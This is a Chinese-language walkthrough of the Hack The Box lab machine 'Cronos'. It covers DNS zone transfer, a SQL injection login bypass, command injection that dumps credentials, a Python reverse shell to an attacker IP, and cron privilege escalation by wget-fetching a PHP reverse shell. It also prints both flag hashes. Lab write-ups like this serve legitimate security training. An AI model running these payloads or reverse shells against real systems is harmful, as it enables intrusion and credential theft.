信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.13 | TCP:22,53,80 |
$ nmap -p- 10.10.10.13 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
DNS 多重解析&子域名查询
$ nslookup 10.10.10.13
$ nslookup 10.10.10.13 10.10.10.13
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图](https://img.4awl.net/img/66/39a70b1a4a4236c1d3a534882be0a5.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图")
$ dig axfr @10.10.10.13 cronos.htb
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图1](https://img.4awl.net/img/e0/0452edf0bbf90b91add2d508a7c89a.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图1")
# echo '10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb'>>/etc/hosts
SQLI & RCE
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图2](https://img.4awl.net/img/0e/ade5641a6bd39dee0d0fa81dddd513.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图2")
username: admin' or '1'='1password: xxxx
8.8.8.8;ls
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图3](https://img.4awl.net/img/5e/632d14541b9ba3d8cebb9ae6f010f3.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图3")
8.8.8.8;cat config.php
username:adminpassword:kEjdbRigfBHUREiNSDs
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图4](https://img.4awl.net/img/df/e3a59b04b055a4e419fcd85b8c793c.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图4")
8.8.8.8;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.24",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图5](https://img.4awl.net/img/81/2bcb7e1d0ede19dc5506af904272aa.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图5")
User.txt
7dd961c26e9e724da5ac41a381b8f585
权限提升
TRP00F 自动化权限提升
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10033 --pkhttpport 9090 --lxhttpport 9900
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图6](https://img.4awl.net/img/13/37b5982d55e443cb9e731660cf1851.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图6")
Crontab 权限提升
$ cat /etc/crontab
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图7](https://img.4awl.net/img/b9/2a8904484ecaefef60c2b40924a49a.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图7")
$ wget -O /var/www/laravel/artisan http://10.10.16.24/reverse.php
![[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图8](https://img.4awl.net/img/4d/e5b52b8eac991040ebe2139f54c25f.jpg "[Meachines] [Medium] Cronos DNS 多重解析+子域名查询+SQLI+RC…插图8")
Root.txt
c5a019884687c3347390940b6ee1eeea
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
